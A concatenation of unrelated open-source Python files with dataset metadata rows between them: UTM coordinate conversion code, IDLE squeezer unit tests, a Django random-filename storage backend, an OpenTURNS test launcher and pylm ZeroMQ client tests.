+ (15*ecc_squared*ecc_squared/256 + 45*ecc_squared*ecc_squared*ecc_squared/1024)*sin(4*lat_rad)
- (35*ecc_squared*ecc_squared*ecc_squared/3072)*sin(6*lat_rad))
utm_easting = (k0*N*(A+(1-T+C)*A*A*A/6
+ (5-18*T+T*T+72*C-58*ecc_prime_squared)*A*A*A*A*A/120)
+ 500000.0)
utm_northing = (k0*(M+N*tan(lat_rad)*(A*A/2+(5-T+9*C+4*C*C)*A*A*A*A/24
+ (61
-58*T
+T*T
+600*C
-330*ecc_prime_squared)*A*A*A*A*A*A/720)))
if lat < 0:
        utm_northing = utm_northing + 10000000.0  # 10,000,000 meter offset for southern hemisphere
return (utm_zone, utm_easting, utm_northing)
def _utm_letter_designator(lat):
"""This routine determines the correct UTM letter designator for the given latitude
returns 'Z' if latitude is outside the UTM limits of 84N to 80S
Written by Chuck Gantz- chuck.gantz@globalstar.com"""
if 84 >= lat >= 72: return 'X'
elif 72 > lat >= 64: return 'W'
elif 64 > lat >= 56: return 'V'
elif 56 > lat >= 48: return 'U'
elif 48 > lat >= 40: return 'T'
elif 40 > lat >= 32: return 'S'
elif 32 > lat >= 24: return 'R'
elif 24 > lat >= 16: return 'Q'
elif 16 > lat >= 8: return 'P'
elif 8 > lat >= 0: return 'N'
elif 0 > lat >= -8: return 'M'
elif -8 > lat >= -16: return 'L'
elif -16 > lat >= -24: return 'K'
elif -24 > lat >= -32: return 'J'
elif -32 > lat >= -40: return 'H'
elif -40 > lat >= -48: return 'G'
elif -48 > lat >= -56: return 'F'
elif -56 > lat >= -64: return 'E'
elif -64 > lat >= -72: return 'D'
elif -72 > lat >= -80: return 'C'
else: return 'Z' # if the Latitude is outside the UTM limits
def utm_to_ll(reference_ellipsoid, northing, easting, zone):
"""converts UTM coords to lat/long. Equations from USGS Bulletin 1532
East Longitudes are positive, West longitudes are negative.
North latitudes are positive, South latitudes are negative
lat and lon are in decimal degrees.
Written by Chuck Gantz- chuck.gantz@globalstar.com
Converted to Python by Russ Nelson <nelson@crynwr.com>"""
k0 = 0.9996
a = _ellipsoid[reference_ellipsoid][_equatorial_radius]
ecc_squared = _ellipsoid[reference_ellipsoid][_eccentricity_squared]
e1 = (1-sqrt(1-ecc_squared))/(1+sqrt(1-ecc_squared))
    # northern_hemisphere: 1 for northern hemisphere, 0 for southern
x = easting - 500000.0 #remove 500,000 meter offset for longitude
y = northing
zone_letter = zone[-1]
zone_number = int(zone[:-1])
if zone_letter >= 'N':
northern_hemisphere = 1 # point is in northern hemisphere
else:
northern_hemisphere = 0 # point is in southern hemisphere
y -= 10000000.0 # remove 10,000,000 meter offset used for southern hemisphere
lon_origin = (zone_number - 1)*6 - 180 + 3 # +3 puts origin in middle of zone
ecc_prime_squared = (ecc_squared)/(1-ecc_squared)
M = y / k0
mu = M/(a*(1-ecc_squared/4-3*ecc_squared*ecc_squared/64-5*ecc_squared*ecc_squared*ecc_squared/256))
phi1_rad = (mu + (3*e1/2-27*e1*e1*e1/32)*sin(2*mu)
+ (21*e1*e1/16-55*e1*e1*e1*e1/32)*sin(4*mu)
+(151*e1*e1*e1/96)*sin(6*mu))
    phi1 = phi1_rad*_rad2deg
N1 = a/sqrt(1-ecc_squared*sin(phi1_rad)*sin(phi1_rad))
T1 = tan(phi1_rad)*tan(phi1_rad)
C1 = ecc_prime_squared*cos(phi1_rad)*cos(phi1_rad)
R1 = a*(1-ecc_squared)/pow(1-ecc_squared*sin(phi1_rad)*sin(phi1_rad), 1.5)
D = x/(N1*k0)
lat = phi1_rad - (N1*tan(phi1_rad)/R1)*(D*D/2-(5+3*T1+10*C1-4*C1*C1-9*ecc_prime_squared)*D*D*D*D/24
+(61+90*T1+298*C1+45*T1*T1-252*ecc_prime_squared-3*C1*C1)*D*D*D*D*D*D/720)
lat = lat * _rad2deg
lon = (D-(1+2*T1+C1)*D*D*D/6+(5-2*C1+28*T1-3*C1*C1+8*ecc_prime_squared+24*T1*T1)
*D*D*D*D*D/120)/cos(phi1_rad)
lon = lon_origin + lon * _rad2deg
return (lat, lon)
def parse_utm(utm_str):
"""Parse UTM coordinates from a string.
utm_str should be a string of the form 'zh n e', where z is a zone
number, h a hemisphere identifier ('N' or 'S') and n and e the
northing and easting. h may be omitted, in which case 'N' is
assumed.
Return value: dictionary with keys (zone, hemisphere, n, e).
"""
default_hemisphere = 'N'
utm_re = (r'^\W*([0-9][0-9])([NS]?)\W+([0-9]*[.]?[0-9]+)\W+'
r'([0-9]*[.]?[0-9]+)\W*$')
m = re.match(utm_re, utm_str)
if m is None:
        raise Exception('incorrectly formatted UTM string "' + utm_str + '"')
utm = {}
utm['zone'] = int(m.group(1))
utm['hemisphere'] = m.group(2)
if utm['hemisphere'] == '':
utm['hemisphere'] = default_hemisphere
utm['n'] = float(m.group(3))
utm['e'] = float(m.group(4))
return utm
def utm_str_to_lonlat(utm_str):
"""Convert UTM coordinates in string form (see parse_utm) to a
(longitude,latitude) pair.
"""
utm = parse_utm(utm_str)
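    # Ellipsoid id 23 is WGS-84 in the _ellipsoid table above.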
(lat, lon) = utm_to_ll(23, utm['n'], utm['e'],
'%d%s'%(utm['zone'], utm['hemisphere']))
return (lon, lat)
| gpl-2.0 | 7,722,432,487,132,970,000 | 36.776119 | 116 | 0.610233 | false |
FFMG/myoddweb.piger | monitor/api/python/Python-3.7.2/Lib/idlelib/idle_test/test_squeezer.py | 1 | 21861 | from collections import namedtuple
from tkinter import Text, Tk
import unittest
from unittest.mock import Mock, NonCallableMagicMock, patch, sentinel, ANY
from test.support import requires
from idlelib.config import idleConf
from idlelib.squeezer import count_lines_with_wrapping, ExpandingButton, \
Squeezer
from idlelib import macosx
from idlelib.textview import view_text
from idlelib.tooltip import Hovertip
from idlelib.pyshell import PyShell
SENTINEL_VALUE = sentinel.SENTINEL_VALUE
def get_test_tk_root(test_instance):
"""Helper for tests: Create a root Tk object."""
requires('gui')
root = Tk()
root.withdraw()
def cleanup_root():
root.update_idletasks()
root.destroy()
test_instance.addCleanup(cleanup_root)
return root
class CountLinesTest(unittest.TestCase):
"""Tests for the count_lines_with_wrapping function."""
def check(self, expected, text, linewidth, tabwidth):
return self.assertEqual(
expected,
count_lines_with_wrapping(text, linewidth, tabwidth),
)
def test_count_empty(self):
"""Test with an empty string."""
self.assertEqual(count_lines_with_wrapping(""), 0)
def test_count_begins_with_empty_line(self):
"""Test with a string which begins with a newline."""
self.assertEqual(count_lines_with_wrapping("\ntext"), 2)
def test_count_ends_with_empty_line(self):
"""Test with a string which ends with a newline."""
self.assertEqual(count_lines_with_wrapping("text\n"), 1)
def test_count_several_lines(self):
"""Test with several lines of text."""
self.assertEqual(count_lines_with_wrapping("1\n2\n3\n"), 3)
def test_tab_width(self):
"""Test with various tab widths and line widths."""
self.check(expected=1, text='\t' * 1, linewidth=8, tabwidth=4)
self.check(expected=1, text='\t' * 2, linewidth=8, tabwidth=4)
self.check(expected=2, text='\t' * 3, linewidth=8, tabwidth=4)
self.check(expected=2, text='\t' * 4, linewidth=8, tabwidth=4)
self.check(expected=3, text='\t' * 5, linewidth=8, tabwidth=4)
# test longer lines and various tab widths
self.check(expected=4, text='\t' * 10, linewidth=12, tabwidth=4)
self.check(expected=10, text='\t' * 10, linewidth=12, tabwidth=8)
self.check(expected=2, text='\t' * 4, linewidth=10, tabwidth=3)
# test tabwidth=1
self.check(expected=2, text='\t' * 9, linewidth=5, tabwidth=1)
self.check(expected=2, text='\t' * 10, linewidth=5, tabwidth=1)
self.check(expected=3, text='\t' * 11, linewidth=5, tabwidth=1)
# test for off-by-one errors
self.check(expected=2, text='\t' * 6, linewidth=12, tabwidth=4)
self.check(expected=3, text='\t' * 6, linewidth=11, tabwidth=4)
self.check(expected=2, text='\t' * 6, linewidth=13, tabwidth=4)
class SqueezerTest(unittest.TestCase):
"""Tests for the Squeezer class."""
def make_mock_editor_window(self):
"""Create a mock EditorWindow instance."""
editwin = NonCallableMagicMock()
# isinstance(editwin, PyShell) must be true for Squeezer to enable
# auto-squeezing; in practice this will always be true
editwin.__class__ = PyShell
return editwin
def make_squeezer_instance(self, editor_window=None):
"""Create an actual Squeezer instance with a mock EditorWindow."""
if editor_window is None:
editor_window = self.make_mock_editor_window()
return Squeezer(editor_window)
def test_count_lines(self):
"""Test Squeezer.count_lines() with various inputs.
This checks that Squeezer.count_lines() calls the
count_lines_with_wrapping() function with the appropriate parameters.
"""
for tabwidth, linewidth in [(4, 80), (1, 79), (8, 80), (3, 120)]:
self._test_count_lines_helper(linewidth=linewidth,
tabwidth=tabwidth)
def _prepare_mock_editwin_for_count_lines(self, editwin,
linewidth, tabwidth):
"""Prepare a mock EditorWindow object for Squeezer.count_lines."""
CHAR_WIDTH = 10
BORDER_WIDTH = 2
PADDING_WIDTH = 1
# Prepare all the required functionality on the mock EditorWindow object
# so that the calculations in Squeezer.count_lines() can run.
editwin.get_tk_tabwidth.return_value = tabwidth
editwin.text.winfo_width.return_value = \
linewidth * CHAR_WIDTH + 2 * (BORDER_WIDTH + PADDING_WIDTH)
text_opts = {
'border': BORDER_WIDTH,
'padx': PADDING_WIDTH,
'font': None,
}
editwin.text.cget = lambda opt: text_opts[opt]
        # monkey-patch tkinter.font.Font with a mock object, so that
# Font.measure('0') returns CHAR_WIDTH
mock_font = Mock()
def measure(char):
if char == '0':
return CHAR_WIDTH
raise ValueError("measure should only be called on '0'!")
mock_font.return_value.measure = measure
patcher = patch('idlelib.squeezer.Font', mock_font)
patcher.start()
self.addCleanup(patcher.stop)
def _test_count_lines_helper(self, linewidth, tabwidth):
"""Helper for test_count_lines."""
editwin = self.make_mock_editor_window()
self._prepare_mock_editwin_for_count_lines(editwin, linewidth, tabwidth)
squeezer = self.make_squeezer_instance(editwin)
mock_count_lines = Mock(return_value=SENTINEL_VALUE)
text = 'TEXT'
with patch('idlelib.squeezer.count_lines_with_wrapping',
mock_count_lines):
self.assertIs(squeezer.count_lines(text), SENTINEL_VALUE)
mock_count_lines.assert_called_with(text, linewidth, tabwidth)
def test_init(self):
"""Test the creation of Squeezer instances."""
editwin = self.make_mock_editor_window()
squeezer = self.make_squeezer_instance(editwin)
self.assertIs(squeezer.editwin, editwin)
self.assertEqual(squeezer.expandingbuttons, [])
def test_write_no_tags(self):
"""Test Squeezer's overriding of the EditorWindow's write() method."""
editwin = self.make_mock_editor_window()
for text in ['', 'TEXT', 'LONG TEXT' * 1000, 'MANY_LINES\n' * 100]:
editwin.write = orig_write = Mock(return_value=SENTINEL_VALUE)
squeezer = self.make_squeezer_instance(editwin)
self.assertEqual(squeezer.editwin.write(text, ()), SENTINEL_VALUE)
self.assertEqual(orig_write.call_count, 1)
orig_write.assert_called_with(text, ())
self.assertEqual(len(squeezer.expandingbuttons), 0)
def test_write_not_stdout(self):
"""Test Squeezer's overriding of the EditorWindow's write() method."""
for text in ['', 'TEXT', 'LONG TEXT' * 1000, 'MANY_LINES\n' * 100]:
editwin = self.make_mock_editor_window()
editwin.write.return_value = SENTINEL_VALUE
orig_write = editwin.write
squeezer = self.make_squeezer_instance(editwin)
self.assertEqual(squeezer.editwin.write(text, "stderr"),
SENTINEL_VALUE)
self.assertEqual(orig_write.call_count, 1)
orig_write.assert_called_with(text, "stderr")
self.assertEqual(len(squeezer.expandingbuttons), 0)
def test_write_stdout(self):
"""Test Squeezer's overriding of the EditorWindow's write() method."""
editwin = self.make_mock_editor_window()
self._prepare_mock_editwin_for_count_lines(editwin,
linewidth=80, tabwidth=8)
for text in ['', 'TEXT']:
editwin.write = orig_write = Mock(return_value=SENTINEL_VALUE)
squeezer = self.make_squeezer_instance(editwin)
squeezer.auto_squeeze_min_lines = 50
self.assertEqual(squeezer.editwin.write(text, "stdout"),
SENTINEL_VALUE)
self.assertEqual(orig_write.call_count, 1)
orig_write.assert_called_with(text, "stdout")
self.assertEqual(len(squeezer.expandingbuttons), 0)
for text in ['LONG TEXT' * 1000, 'MANY_LINES\n' * 100]:
editwin.write = orig_write = Mock(return_value=SENTINEL_VALUE)
squeezer = self.make_squeezer_instance(editwin)
squeezer.auto_squeeze_min_lines = 50
self.assertEqual(squeezer.editwin.write(text, "stdout"), None)
self.assertEqual(orig_write.call_count, 0)
self.assertEqual(len(squeezer.expandingbuttons), 1)
def test_auto_squeeze(self):
"""Test that the auto-squeezing creates an ExpandingButton properly."""
root = get_test_tk_root(self)
text_widget = Text(root)
text_widget.mark_set("iomark", "1.0")
editwin = self.make_mock_editor_window()
editwin.text = text_widget
squeezer = self.make_squeezer_instance(editwin)
squeezer.auto_squeeze_min_lines = 5
squeezer.count_lines = Mock(return_value=6)
editwin.write('TEXT\n'*6, "stdout")
self.assertEqual(text_widget.get('1.0', 'end'), '\n')
self.assertEqual(len(squeezer.expandingbuttons), 1)
def test_squeeze_current_text_event(self):
"""Test the squeeze_current_text event."""
root = get_test_tk_root(self)
# squeezing text should work for both stdout and stderr
for tag_name in ["stdout", "stderr"]:
text_widget = Text(root)
text_widget.mark_set("iomark", "1.0")
editwin = self.make_mock_editor_window()
editwin.text = editwin.per.bottom = text_widget
squeezer = self.make_squeezer_instance(editwin)
squeezer.count_lines = Mock(return_value=6)
# prepare some text in the Text widget
text_widget.insert("1.0", "SOME\nTEXT\n", tag_name)
text_widget.mark_set("insert", "1.0")
self.assertEqual(text_widget.get('1.0', 'end'), 'SOME\nTEXT\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 0)
# test squeezing the current text
retval = squeezer.squeeze_current_text_event(event=Mock())
self.assertEqual(retval, "break")
self.assertEqual(text_widget.get('1.0', 'end'), '\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 1)
self.assertEqual(squeezer.expandingbuttons[0].s, 'SOME\nTEXT')
# test that expanding the squeezed text works and afterwards the
# Text widget contains the original text
squeezer.expandingbuttons[0].expand(event=Mock())
self.assertEqual(text_widget.get('1.0', 'end'), 'SOME\nTEXT\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 0)
def test_squeeze_current_text_event_no_allowed_tags(self):
"""Test that the event doesn't squeeze text without a relevant tag."""
root = get_test_tk_root(self)
text_widget = Text(root)
text_widget.mark_set("iomark", "1.0")
editwin = self.make_mock_editor_window()
editwin.text = editwin.per.bottom = text_widget
squeezer = self.make_squeezer_instance(editwin)
squeezer.count_lines = Mock(return_value=6)
# prepare some text in the Text widget
text_widget.insert("1.0", "SOME\nTEXT\n", "TAG")
text_widget.mark_set("insert", "1.0")
self.assertEqual(text_widget.get('1.0', 'end'), 'SOME\nTEXT\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 0)
# test squeezing the current text
retval = squeezer.squeeze_current_text_event(event=Mock())
self.assertEqual(retval, "break")
self.assertEqual(text_widget.get('1.0', 'end'), 'SOME\nTEXT\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 0)
def test_squeeze_text_before_existing_squeezed_text(self):
"""Test squeezing text before existing squeezed text."""
root = get_test_tk_root(self)
text_widget = Text(root)
text_widget.mark_set("iomark", "1.0")
editwin = self.make_mock_editor_window()
editwin.text = editwin.per.bottom = text_widget
squeezer = self.make_squeezer_instance(editwin)
squeezer.count_lines = Mock(return_value=6)
# prepare some text in the Text widget and squeeze it
text_widget.insert("1.0", "SOME\nTEXT\n", "stdout")
text_widget.mark_set("insert", "1.0")
squeezer.squeeze_current_text_event(event=Mock())
self.assertEqual(len(squeezer.expandingbuttons), 1)
# test squeezing the current text
text_widget.insert("1.0", "MORE\nSTUFF\n", "stdout")
text_widget.mark_set("insert", "1.0")
retval = squeezer.squeeze_current_text_event(event=Mock())
self.assertEqual(retval, "break")
self.assertEqual(text_widget.get('1.0', 'end'), '\n\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 2)
self.assertTrue(text_widget.compare(
squeezer.expandingbuttons[0],
'<',
squeezer.expandingbuttons[1],
))
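    # Helpers for capturing and inspecting the arguments of mocked
    # idleConf.GetOption-style calls.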
GetOptionSignature = namedtuple('GetOptionSignature',
'configType section option default type warn_on_default raw')
@classmethod
def _make_sig(cls, configType, section, option, default=sentinel.NOT_GIVEN,
type=sentinel.NOT_GIVEN,
warn_on_default=sentinel.NOT_GIVEN,
raw=sentinel.NOT_GIVEN):
return cls.GetOptionSignature(configType, section, option, default,
type, warn_on_default, raw)
@classmethod
def get_GetOption_signature(cls, mock_call_obj):
args, kwargs = mock_call_obj[-2:]
return cls._make_sig(*args, **kwargs)
def test_reload(self):
"""Test the reload() class-method."""
self.assertIsInstance(Squeezer.auto_squeeze_min_lines, int)
idleConf.SetOption('main', 'PyShell', 'auto-squeeze-min-lines', '42')
Squeezer.reload()
self.assertEqual(Squeezer.auto_squeeze_min_lines, 42)
class ExpandingButtonTest(unittest.TestCase):
"""Tests for the ExpandingButton class."""
# In these tests the squeezer instance is a mock, but actual tkinter
# Text and Button instances are created.
def make_mock_squeezer(self):
"""Helper for tests: Create a mock Squeezer object."""
root = get_test_tk_root(self)
squeezer = Mock()
squeezer.editwin.text = Text(root)
# Set default values for the configuration settings
squeezer.auto_squeeze_min_lines = 50
return squeezer
@patch('idlelib.squeezer.Hovertip', autospec=Hovertip)
def test_init(self, MockHovertip):
"""Test the simplest creation of an ExpandingButton."""
squeezer = self.make_mock_squeezer()
text_widget = squeezer.editwin.text
expandingbutton = ExpandingButton('TEXT', 'TAGS', 50, squeezer)
self.assertEqual(expandingbutton.s, 'TEXT')
# check that the underlying tkinter.Button is properly configured
self.assertEqual(expandingbutton.master, text_widget)
self.assertTrue('50 lines' in expandingbutton.cget('text'))
# check that the text widget still contains no text
self.assertEqual(text_widget.get('1.0', 'end'), '\n')
# check that the mouse events are bound
self.assertIn('<Double-Button-1>', expandingbutton.bind())
right_button_code = '<Button-%s>' % ('2' if macosx.isAquaTk() else '3')
self.assertIn(right_button_code, expandingbutton.bind())
# check that ToolTip was called once, with appropriate values
self.assertEqual(MockHovertip.call_count, 1)
MockHovertip.assert_called_with(expandingbutton, ANY, hover_delay=ANY)
# check that 'right-click' appears in the tooltip text
tooltip_text = MockHovertip.call_args[0][1]
self.assertIn('right-click', tooltip_text.lower())
def test_expand(self):
"""Test the expand event."""
squeezer = self.make_mock_squeezer()
expandingbutton = ExpandingButton('TEXT', 'TAGS', 50, squeezer)
# insert the button into the text widget
# (this is normally done by the Squeezer class)
text_widget = expandingbutton.text
text_widget.window_create("1.0", window=expandingbutton)
# set base_text to the text widget, so that changes are actually made
# to it (by ExpandingButton) and we can inspect these changes afterwards
expandingbutton.base_text = expandingbutton.text
# trigger the expand event
retval = expandingbutton.expand(event=Mock())
self.assertEqual(retval, None)
# check that the text was inserted into the text widget
self.assertEqual(text_widget.get('1.0', 'end'), 'TEXT\n')
# check that the 'TAGS' tag was set on the inserted text
text_end_index = text_widget.index('end-1c')
self.assertEqual(text_widget.get('1.0', text_end_index), 'TEXT')
self.assertEqual(text_widget.tag_nextrange('TAGS', '1.0'),
('1.0', text_end_index))
# check that the button removed itself from squeezer.expandingbuttons
self.assertEqual(squeezer.expandingbuttons.remove.call_count, 1)
squeezer.expandingbuttons.remove.assert_called_with(expandingbutton)
    def test_expand_dangerous_output(self):
"""Test that expanding very long output asks user for confirmation."""
squeezer = self.make_mock_squeezer()
text = 'a' * 10**5
expandingbutton = ExpandingButton(text, 'TAGS', 50, squeezer)
expandingbutton.set_is_dangerous()
self.assertTrue(expandingbutton.is_dangerous)
# insert the button into the text widget
# (this is normally done by the Squeezer class)
text_widget = expandingbutton.text
text_widget.window_create("1.0", window=expandingbutton)
# set base_text to the text widget, so that changes are actually made
# to it (by ExpandingButton) and we can inspect these changes afterwards
expandingbutton.base_text = expandingbutton.text
# patch the message box module to always return False
with patch('idlelib.squeezer.tkMessageBox') as mock_msgbox:
mock_msgbox.askokcancel.return_value = False
mock_msgbox.askyesno.return_value = False
# trigger the expand event
retval = expandingbutton.expand(event=Mock())
# check that the event chain was broken and no text was inserted
self.assertEqual(retval, 'break')
self.assertEqual(expandingbutton.text.get('1.0', 'end-1c'), '')
# patch the message box module to always return True
with patch('idlelib.squeezer.tkMessageBox') as mock_msgbox:
mock_msgbox.askokcancel.return_value = True
mock_msgbox.askyesno.return_value = True
# trigger the expand event
retval = expandingbutton.expand(event=Mock())
# check that the event chain wasn't broken and the text was inserted
self.assertEqual(retval, None)
self.assertEqual(expandingbutton.text.get('1.0', 'end-1c'), text)
def test_copy(self):
"""Test the copy event."""
# testing with the actual clipboard proved problematic, so this test
# replaces the clipboard manipulation functions with mocks and checks
# that they are called appropriately
squeezer = self.make_mock_squeezer()
expandingbutton = ExpandingButton('TEXT', 'TAGS', 50, squeezer)
expandingbutton.clipboard_clear = Mock()
expandingbutton.clipboard_append = Mock()
# trigger the copy event
retval = expandingbutton.copy(event=Mock())
self.assertEqual(retval, None)
# check that the expanding button called clipboard_clear() and
# clipboard_append('TEXT') once each
self.assertEqual(expandingbutton.clipboard_clear.call_count, 1)
self.assertEqual(expandingbutton.clipboard_append.call_count, 1)
expandingbutton.clipboard_append.assert_called_with('TEXT')
def test_view(self):
"""Test the view event."""
squeezer = self.make_mock_squeezer()
expandingbutton = ExpandingButton('TEXT', 'TAGS', 50, squeezer)
expandingbutton.selection_own = Mock()
with patch('idlelib.squeezer.view_text', autospec=view_text)\
as mock_view_text:
# trigger the view event
expandingbutton.view(event=Mock())
# check that the expanding button called view_text
self.assertEqual(mock_view_text.call_count, 1)
# check that the proper text was passed
self.assertEqual(mock_view_text.call_args[0][2], 'TEXT')
def test_rmenu(self):
"""Test the context menu."""
squeezer = self.make_mock_squeezer()
expandingbutton = ExpandingButton('TEXT', 'TAGS', 50, squeezer)
with patch('tkinter.Menu') as mock_Menu:
mock_menu = Mock()
mock_Menu.return_value = mock_menu
mock_event = Mock()
mock_event.x = 10
mock_event.y = 10
expandingbutton.context_menu_event(event=mock_event)
self.assertEqual(mock_menu.add_command.call_count,
len(expandingbutton.rmenu_specs))
for label, *data in expandingbutton.rmenu_specs:
mock_menu.add_command.assert_any_call(label=label, command=ANY)
if __name__ == '__main__':
unittest.main(verbosity=2)
| gpl-2.0 | 148,277,836,799,124,160 | 41.948919 | 80 | 0.631032 | false |
everlof/RestKit-n-Django-Sample | Project_Django/cite/storage.py | 1 | 6739 | # This file has been shamelessly copied (MIT licence) from
# https://bitbucket.org/akoha/django-randomfilenamestorage
# Conversion to Python 3 by Alexander Nilsson
from errno import EEXIST
import ntpath
import os
import posixpath
import random
import string
from warnings import warn
from django.conf import settings
from django.core.files.storage import (Storage, FileSystemStorage,
locks, file_move_safe)
CHARACTERS = string.ascii_lowercase + string.digits
DEFAULT_LENGTH = 16
def random_string(length):
return ''.join(random.choice(CHARACTERS) for i in range(length))
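# Class factory: wraps a storage class so that saved files get random basenames
# of the configured length (see RandomFilenameFileSystemStorage below).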
def RandomFilenameMetaStorage(storage_class, length=None, uniquify_names=True):
class RandomFilenameStorage(storage_class):
def __init__(self, *args, **kwargs):
self.randomfilename_length = kwargs.pop('randomfilename_length',
length)
if self.randomfilename_length is None:
self.randomfilename_length = getattr(settings,
'RANDOM_FILENAME_LENGTH',
DEFAULT_LENGTH)
# Do not uniquify filenames by default.
self.randomfilename_uniquify_names = kwargs.pop('uniquify_names',
uniquify_names)
# But still try to tell storage_class not to uniquify filenames.
# This class will be the one that uniquifies.
try:
new_kwargs = dict(kwargs, uniquify_names=False)
super(RandomFilenameStorage, self).__init__(*args,
**new_kwargs)
except TypeError:
super(RandomFilenameStorage, self).__init__(*args, **kwargs)
def get_available_name(self, name, retry=True):
# All directories have forward slashes, even on Windows
name = name.replace(ntpath.sep, posixpath.sep)
dir_name, file_name = posixpath.split(name)
file_root, file_ext = posixpath.splitext(file_name)
# If retry is True and the filename already exists, keep
# on generating random filenames until the generated
# filename doesn't exist.
while True:
file_prefix = random_string(self.randomfilename_length)
# file_ext includes the dot.
name = posixpath.join(dir_name, file_prefix + file_ext)
if not retry or not self.exists(name):
return name
def _save(self, name, *args, **kwargs):
while True:
try:
return super(RandomFilenameStorage, self)._save(name,
*args,
**kwargs)
except OSError as e:
if e.errno == EEXIST:
# We have a safe storage layer
if not self.randomfilename_uniquify_names:
# A higher storage layer will rename
raise
# Attempt to get_available_name() without retrying.
try:
name = self.get_available_name(name,
retry=False)
except TypeError:
warn('Could not call get_available_name() '
'on %r with retry=False' % self)
name = self.get_available_name(name)
else:
raise
RandomFilenameStorage.__name__ = 'RandomFilename' + storage_class.__name__
return RandomFilenameStorage
class SafeFileSystemStorage(FileSystemStorage):
"""
Standard filesystem storage
Supports *uniquify_names*, like other safe storage classes.
Based on django.core.files.storage.FileSystemStorage.
"""
def __init__(self, *args, **kwargs):
self.uniquify_names = kwargs.pop('uniquify_names', True)
super(SafeFileSystemStorage, self).__init__(*args, **kwargs)
def _save(self, name, content):
full_path = self.path(name)
directory = os.path.dirname(full_path)
if not os.path.exists(directory):
os.makedirs(directory)
elif not os.path.isdir(directory):
raise IOError("%s exists and is not a directory." % directory)
# There's a potential race condition between get_available_name and
# saving the file; it's possible that two threads might return the
# same name, at which point all sorts of fun happens. So we need to
# try to create the file, but if it already exists we have to go back
# to get_available_name() and try again.
while True:
try:
# This file has a file path that we can move.
if hasattr(content, 'temporary_file_path'):
file_move_safe(content.temporary_file_path(), full_path)
content.close()
# This is a normal uploadedfile that we can stream.
else:
# This fun binary flag incantation makes os.open throw an
# OSError if the file already exists before we open it.
fd = os.open(full_path,
(os.O_WRONLY | os.O_CREAT | os.O_EXCL |
getattr(os, 'O_BINARY', 0)))
try:
locks.lock(fd, locks.LOCK_EX)
for chunk in content.chunks():
os.write(fd, chunk)
finally:
locks.unlock(fd)
os.close(fd)
except OSError as e:
if e.errno == EEXIST:
# Ooops, the file exists. We need a new file name.
if not self.uniquify_names:
raise
name = self.get_available_name(name)
full_path = self.path(name)
else:
raise
else:
# OK, the file save worked. Break out of the loop.
break
if settings.FILE_UPLOAD_PERMISSIONS is not None:
os.chmod(full_path, settings.FILE_UPLOAD_PERMISSIONS)
return name
RandomFilenameFileSystemStorage = RandomFilenameMetaStorage(
storage_class=SafeFileSystemStorage,
)
| mit | -733,618,468,414,824,200 | 42.477419 | 79 | 0.520255 | false |
openturns/otdistfunc | python/test/t_distributed_python_wrapper_std.py | 1 | 1727 | #! /usr/bin/env python
# -*- coding: utf8 -*-
import sys
import os
# space separated list of hosts
#remote_hosts = "localhost node-1:2 node-3:4"
remote_hosts = "localhost"
test_dir = os.path.dirname(os.path.realpath(__file__))
start_script = sys.executable + " " + test_dir + os.sep + \
"t_distributed_python_wrapper.py"
test_type = "local"
if len(sys.argv) >= 3:
test_type = sys.argv[2]
if test_type == "local":
default_param = " --test local "
elif test_type == "remote":
default_param = " --test remote --hosts " + remote_hosts + " "
else:
print ('Wrong arguments!')
exit(1)
os.system(start_script + default_param + " --point ")
os.system(start_script + default_param + " --analytical ")
os.system(start_script + default_param + " --point --analytical ")
os.system(start_script + default_param +
"--sample-size 50 --work-time 0.1 ")
os.system(start_script + default_param +
"--sample-size 10 --nb-output 1000 ")
os.system(start_script + default_param +
"--sample-size 1 ")
os.system(start_script + default_param +
"--sample-size 5 --work-time 0.1 --cleanup no ")
os.system(start_script + default_param +
"--sample-size 1 --cleanup no ")
os.system(start_script + default_param +
"--sample-size 5 --work-time 0.1 --cleanup all ")
os.system(start_script + default_param +
"--sample-size 1 --cleanup all ")
os.system(start_script + default_param +
" --sample-size 10 --work-time 0.1 --error ")
os.system(start_script + default_param +
" --sample-size 4 --work-time 0.1 --error --cleanup no")
os.system(start_script + default_param +
" --sample-size 4 --work-time 0.1 --error --cleanup all")
| lgpl-3.0 | -7,919,461,645,429,032,000 | 29.839286 | 67 | 0.62073 | false |
nfqsolutions/pylm | tests/test_services/test_subscribed_client.py | 1 | 2736 | import concurrent.futures
import time
from concurrent.futures import ThreadPoolExecutor
import zmq
from pylm.clients import Client
from pylm.parts.core import zmq_context
from pylm.parts.messages_pb2 import PalmMessage
def fake_server(messages=1):
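    # Minimal stand-in for a pylm server: accepts messages pushed to the PULL
    # socket and republishes each one on the PUB socket under the client topic.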
db_socket = zmq_context.socket(zmq.REP)
db_socket.bind('inproc://db')
pull_socket = zmq_context.socket(zmq.PULL)
pull_socket.bind('inproc://pull')
pub_socket = zmq_context.socket(zmq.PUB)
pub_socket.bind('inproc://pub')
# PUB-SUB takes a while
time.sleep(1.0)
for i in range(messages):
message_data = pull_socket.recv()
print(i)
message = PalmMessage()
message.ParseFromString(message_data)
topic = message.client
pub_socket.send_multipart([topic.encode('utf-8'), message_data])
def test_subscribed_client_single():
got = []
client = Client(
server_name='someserver',
db_address='inproc://db',
push_address='inproc://pull',
sub_address='inproc://pub',
this_config=True)
with ThreadPoolExecutor(max_workers=2) as executor:
results = [
executor.submit(fake_server, messages=2),
executor.submit(client.job, 'f', [b'1', b'2'], messages=2)
]
for future in concurrent.futures.as_completed(results):
try:
result = future.result()
if result:
for r in result:
got.append(r)
except Exception as exc:
print(exc)
assert len(got) == 2
def test_subscribed_client_multiple():
got = []
client = Client(
server_name='someserver',
db_address='inproc://db',
sub_address='inproc://pub',
push_address='inproc://pull',
this_config=True)
client1 = Client(
server_name='someserver',
db_address='inproc://db',
sub_address='inproc://pub',
push_address='inproc://pull',
this_config=True)
with ThreadPoolExecutor(max_workers=2) as executor:
results = [
executor.submit(fake_server, messages=4),
executor.submit(client.job, 'f', [b'1', b'2'], messages=2),
executor.submit(client1.job, 'f', [b'a', b'b'], messages=2)
]
for future in concurrent.futures.as_completed(results):
try:
result = future.result()
if result:
for r in result:
got.append(r)
except Exception as exc:
print(exc)
assert len(got) == 4
if __name__ == '__main__':
test_subscribed_client_single()
test_subscribed_client_multiple()
| agpl-3.0 | -7,718,448,006,989,908,000 | 25.823529 | 72 | 0.56981 | false |
